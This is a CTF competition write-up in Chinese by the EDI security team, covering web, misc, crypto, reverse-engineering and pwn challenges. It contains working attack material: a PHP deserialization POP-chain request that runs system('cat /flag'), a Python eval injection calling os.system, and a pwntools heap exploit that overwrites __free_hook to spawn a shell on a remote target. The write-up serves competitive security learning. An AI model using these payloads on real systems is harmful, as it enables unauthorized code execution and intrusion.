2022年第三届电信和互联网行业职业技能竞赛WriteUp

admin 2022年10月1日08:27:34CTF专场评论86 views5313字阅读17分42秒阅读模式

EDI

JOIN US ▶▶▶

招新


EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。

欢迎各位师傅加入EDI,大家一起打CTF,一起进步。

诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱[email protected]edisec.net、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Web

1

web2

pop调用链

2022年第三届电信和互联网行业职业技能竞赛WriteUp


2022年第三届电信和互联网行业职业技能竞赛WriteUp

POST / HTTP/1.1Host: 80.endpoint-e646733904b94fe4929cda92cfb6e548.dasc.buuoj.cn:81Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/104.0.5112.102 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 740data=O%3A1%3A%22a%22%3A2%3A%7Bs%3A8%3A%22%00a%00_path%22%3BO%3A1%3A%22b%22%3A3%3A%7Bs%3A7%3A%22%00b%00name%22%3Bs%3A5%3A%22admin%22%3Bs%3A8%3A%22%00b%00value%22%3BO%3A1%3A%22e%22%3A2%3A%7Bs%3A9%3A%22%00%2A%00config%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A5%3A%22admin%22%3B%7Ds%3A7%3A%22%00%2A%00code%22%3Bs%3A28%3A%22%3C%3Fphp+system%28%27cat+%2Fflag%27%29%3B%3F%3E%22%3B%7Ds%3A7%3A%22%00b%00util%22%3BO%3A1%3A%22c%22%3A2%3A%7Bs%3A12%3A%22%00%2A%00container%22%3BO%3A1%3A%22d%22%3A1%3A%7Bs%3A10%3A%22%00%2A%00default%22%3Bs%3A4%3A%22evil%22%3B%7Ds%3A13%3A%22%00%2A%00extensions%22%3Ba%3A1%3A%7Bs%3A1%3A%22y%22%3Bs%3A9%3A%22evil%40load%22%3B%7D%7D%7Ds%3A8%3A%22%00a%00_keys%22%3Ba%3A1%3A%7Bi%3A0%3Br%3A2%3B%7D%7D

2

web3

initjs最下面 看到路由

2022年第三届电信和互联网行业职业技能竞赛WriteUp

02

Misc

1

misc eye

foremost分离zip 后crc爆破

2022年第三届电信和互联网行业职业技能竞赛WriteUp

2022年第三届电信和互联网行业职业技能竞赛WriteUp

2022年第三届电信和互联网行业职业技能竞赛WriteUp

2022年第三届电信和互联网行业职业技能竞赛WriteUp

2

calc

key="0317dcd25f8916b43998be722434ed14"def calc():    line = input(" >>> ")    print(line)    if(len(line)>9):        return print("500 Internal Server Errorn")    try:        print(eval(line))    except:        passdef supper_calc():    print("Please enter the invitation code")    code = input(" >>> ")    if(code == key):        line = input(" >>> ")        try:            print(eval(line))        except:            pass    else:        print("403 Forbiddenn")      while(1):    print("What do you want?")    print('1.clac')    print('2.supper clac')    choice = input("Please input your option >>> ")    if(choice == "1"):        calc()        input("press any key to continue...")    elif(choice == "2"):        supper_calc()        input("press any key to continue...")    else:        print("404 NOT FOUNDn")        input("press any key to continue...")

2022年第三届电信和互联网行业职业技能竞赛WriteUp

获取key

 >>>__import__('os').system('cat /fl*')flag{99696097104207069032117932541956}

3

misc3

flag = ['119', '104', '121', '32', '116', '104', '101', '114', '101', '32','105', '115', '32', '111', '110', '108', '121', '32', '49', '50', '32', '112','97', '108', '109', '63', '119', '104', '97', '116', '32', '105', '115', '32','119', '114', '111', '110', '103', '32', '119', '105', '116', '104', '32', '116','104', '101', '32', '108', '101', '102', '116', '32', '54', '63', '119', '97','116', '99', '104', '32', '116', '104', '101', '32', '100', '105', '102', '102','101', '114', '101', '110', '99', '101', '32', '98', '101', '116', '119', '101','110', '110', '32', '49', '50', '32', '97', '110', '100', '32', '54', '75','75']name = ''for w in flag:print(chr(int(w)))name += chr(int(w))print(name)

03

Crypto

1

babysm1

对c开3次方

https://sagecell.sagemath.org/

c = 2217344750798236287989923271111493621814821232365781784992845921175835939916080255971267802993897386183080504406849487970548937348304569582798336704291413362485808165972480022302292463614365892149324677003706817975871653875892621395157463049066727487824595070529224326645861a = c^(1/3)bytes.fromhex(hex(a)[2:])

2022年第三届电信和互联网行业职业技能竞赛WriteUp

2

old_rsa

2022年第三届电信和互联网行业职业技能竞赛WriteUp

3

奇怪的AES

2022年第三届电信和互联网行业职业技能竞赛WriteUp

04

Re

1

ezxorcpp

2022年第三届电信和互联网行业职业技能竞赛WriteUp

看unk_5E3248

2022年第三届电信和互联网行业职业技能竞赛WriteUp

一堆mov操作

2022年第三届电信和互联网行业职业技能竞赛WriteUp

复制出来

2022年第三届电信和互联网行业职业技能竞赛WriteUp

key = """  v3[0] = 66;  v3[1] = 20;  v3[2] = 73;  v3[3] = 17;  v3[4] = 73;  v3[5] = 67;  v3[6] = 22;  v3[7] = 21;  v3[8] = 66;  v3[9] = 73;  v3[10] = 17;  v3[11] = 71;  v3[12] = 66;  v3[13] = 67;  v3[14] = 69;  v3[15] = 69;  v3[16] = 20;  v3[17] = 18;  v3[18] = 71;  v3[19] = 18;  v3[20] = 71;  v3[21] = 18;  v3[22] = 72;  v3[23] = 18;  v3[24] = 22;  v3[25] = 72;  v3[26] = 20;  v3[27] = 70;  v3[28] = 70;  v3[29] = 20;  v3[30] = 19;  v3[31] = 17;"""import redata = re.findall("= (.*?);",key)# print(data)lisss = ['66', '20', '73', '17', '73', '67', '22', '21', '66', '73', '17', '71', '66', '67', '69', '69', '20', '18', '71', '18', '71', '18', '72', '18', '22', '72', '20', '70', '70', '20', '19', '17']flag = ''for w in lisss:    print(chr(112^int(w)))    flag += chr(112^int(w))
print(flag[::-1])

05

Pwn

1

pwn1

from pwn import *from LibcSearcher import *from sys import *context.log_level = 'debug'context.terminal = ['tmux','splitw','-h']file = './pwn'p = process(file)e = ELF(file)libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')if args.R:    p = remote('1.14.97.218',28318)    # e = ELF(file)    # libc = ELF('./libc-2.27.buu.so')sla = lambda x,y : p.sendlineafter(x,y)sa = lambda x,y : p.sendafter(x,y)sl = lambda x : p.sendline(x)s = lambda x : p.send(x)ru = lambda x : p.recvuntil(x)r = lambda x : p.recv(x=None)rl = lambda : p.recvline()def debug(cmd=''):    gdb.attach(p,cmd)    pause()def init(name,password,email,x):    sla('namen',name)    sla('passwordn',password)    sla('emailn',email)    sla('do u wanna complete your messages?n',x)def add():    sl('1')def edit(index,content):    sl('2')    sla('index:n',str(index))    sla('content:n',str(content))def delete(index):    sl('3')    sla('index:n',str(index))def show(index):    sl('4')    sla('index:n',str(index))# init('a','a','a','a')# add()# edit(0,'a')# delete(0)# show(0)init('a','a','a','a')add()add()edit(0,'/bin/sh')debug()show(-4)free_hook = u64(p.recvuntil('x7f')[-6:].ljust(8,'x00')) - 0x597ec8log.success('free_hook = '+hex(free_hook))libc_base = free_hook - libc.sym['__free_hook']log.success('libc_base = '+hex(libc_base))ones = [0x4f3d5,0x4f432,0x10a41c]one_gadget = libc_base + ones[1]edit(-9,p64(free_hook))edit(-0x1a,p64(one_gadget))delete(0)# free_hook = p.interactive()


EDI安全

2022年第三届电信和互联网行业职业技能竞赛WriteUp

扫二维码|关注我们

一个专注渗透实战经验分享的公众号


原文始发于微信公众号(EDI安全):2022年第三届电信和互联网行业职业技能竞赛WriteUp

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年10月1日08:27:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  2022年第三届电信和互联网行业职业技能竞赛WriteUp http://cn-sec.com/archives/1327847.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: